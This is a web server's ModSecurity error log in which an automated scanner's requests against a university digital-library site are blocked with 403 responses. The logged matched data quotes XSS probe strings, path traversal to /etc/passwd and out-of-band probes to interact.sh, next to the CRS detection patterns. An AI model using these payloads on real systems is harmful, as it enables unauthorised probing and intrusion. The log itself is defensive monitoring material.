[Tue Aug 29 11:52:49.632851 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAlUlxUAAAA0"]
[Tue Aug 29 11:52:49.636882 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoVqpwAAAAH"]
[Tue Aug 29 11:52:50.567849 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15osCo-f0AAAnTlV4AAAAA"]
[Tue Aug 29 11:52:51.829500 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAnd3NYAAAAI"]
[Tue Aug 29 11:52:52.643649 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAoLfMwAAAAG"]
[Tue Aug 29 11:52:52.770728 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAnTlXMAAAAA"]
[Tue Aug 29 11:52:52.867006 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAnTlXYAAAAA"]
[Tue Aug 29 11:52:55.892822 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAoesJIAAAAV"]
[Tue Aug 29 11:52:55.978854 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAofm24AAAAX"]
[Tue Aug 29 11:52:55.983342 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAmQ-4AAAAAb"]
[Tue Aug 29 11:52:57.828366 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15qcCo-f0AAAnHQrEAAAAT"]
[Tue Aug 29 11:52:59.148153 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoZ6RIAAAAK"]
[Tue Aug 29 11:53:00.665339 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAoZ6RkAAAAK"]
[Tue Aug 29 11:53:00.711751 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAoXJtMAAAAP"]
[Tue Aug 29 11:53:01.577159 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAolKSkAAAAe"]
[Tue Aug 29 11:53:01.938738 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAot8K8AAAAn"]
[Tue Aug 29 11:53:02.643034 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAoVqsYAAAAH"]
[Tue Aug 29 11:53:02.737523 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAoesKUAAAAV"]
[Tue Aug 29 11:53:04.030809 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAofm4MAAAAX"]
[Tue Aug 29 11:53:04.871253 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAojaoAAAAAb"]
[Tue Aug 29 11:53:04.873192 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAofm4YAAAAX"]
[Tue Aug 29 11:53:06.052683 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAosCvEAAAAm"]
[Tue Aug 29 11:53:07.566107 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15s8Co-f0AAAoXJuIAAAAP"]
[Tue Aug 29 11:53:08.252768 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoqbO0AAAAj"]
[Tue Aug 29 11:53:08.258412 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAoocwAAAAAh"]
[Tue Aug 29 11:53:08.779538 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoT7UIAAAAD"]
[Tue Aug 29 11:53:09.572342 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tcCo-f0AAAot8MQAAAAn"]
[Tue Aug 29 11:53:10.420493 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAn403MAAAAW"]
